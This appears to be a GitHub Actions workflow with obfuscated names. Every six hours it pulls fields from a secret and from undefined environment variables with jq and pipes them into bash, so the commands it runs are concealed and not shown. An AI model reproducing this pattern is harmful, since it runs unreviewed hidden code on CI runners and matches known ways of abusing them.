name: xieqianli3765

on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xieqianli3765
        env:
          y3: ${{ secrets.y3 }}
        run: |
          echo $y3 | jq -r .o9 | /bin/bash
          echo $whggf8570 | jq -r .mtnd0631 | /bin/bash
          echo $au7 | jq -r .hqw99077 | /bin/bash
          echo $qgcoz0240 | jq -r .esyvz2 | /bin/bash
          echo $mawjd152 | jq -r .ne4646 | /bin/bash
          echo $mrz01 | jq -r .lncaq96932 | /bin/bash
          echo $psn04 | jq -r .lum00885 | /bin/bash
          echo $xvm83331 | jq -r .s4358 | /bin/bash
          echo $kcgwz415 | jq -r .snvj456 | /bin/bash
          echo $ijmr9 | jq -r .g6 | /bin/bash
          echo $rm42322 | jq -r .e2351 | /bin/bash
          echo $btk58149 | jq -r .logna8 | /bin/bash

